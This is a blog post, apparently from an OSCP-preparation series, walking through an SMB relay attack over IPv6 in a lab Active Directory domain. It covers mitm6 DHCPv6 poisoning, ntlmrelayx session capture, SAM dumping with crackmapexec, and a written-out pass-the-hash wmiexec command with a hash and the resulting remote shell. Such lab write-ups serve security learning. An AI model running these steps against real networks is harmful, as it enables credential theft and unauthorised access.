Total Pageviews

Friday, September 17, 2021

Active Directory CORPORATIVE.domain.local Series[V] : SAMBARelay over IPV6

 Hi everyone,


So far so good, in this post we are going to performa samba relay attack using IPV6 protocal. Sometimes when the IPV4 is strong securize you could use this kind of attack in order to compromise a smb communication.


Now i'm going to define step by  step the SMB relay process attack using ipv6, because is a little bit different that IPV4 and use other tools:

    1. The first point is create a a MItM (Man in the middle) attack over IPV6 protocol, this attack is very easy using the following tool "mitm6":

You can find it at github on the following url: https://github.com/fox-it/mitm6



This tool poisoning the network using DHCP6 and replay it'is own ipv6 link-local address and setting the attackers host as default DNS server.


On the previous image, you can saw a poisoned target machine with the attacker machine ipv6-local setting.


2. The second step is using ntlmrelayx.py tool, for intercept smb connection over iv6 network:

    



After user attemp to access to a non existing, smb shared folder, we could intercept the socks, for the user worker with aministrative privileges:





3. Using proxychains with crackmapexec we can access to the target machine using the  socks captured over localhost without password beacuse the sock connection conatins an open session with password:

On the next image you can see the poxychain configuration and user credentials connection test using crackmapexec: 



Example of dump the SAM, on the target machine, using proxychains and crackmapexec:




It possible validate the NTLM hash on the target machine using ipv4:




And finally execute Pth "Pass the hash" attack, using wmiexec tool:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/wmiexec.py worker2@10.0.2.15 -hashes aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
corporative\worker2

C:\>ipconfig
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec

Configuraci�n IP de Windows


Adaptador de Ethernet Ethernet:

   Sufijo DNS espec�fico para la conexi�n. . : 
   V�nculo: direcci�n IPv6 local. . . : fe80::6580:58ad:d564:3e76%12
   Direcci�n IPv4. . . . . . . . . . . . . . : 10.0.2.15
   M�scara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : 10.0.2.1

C:\>hostname
WKS-001

C:\>


And this is all ,for this Active directory Attack, I hope that you enjoy with my fiveth windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

with kind regards, f0ns1



at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...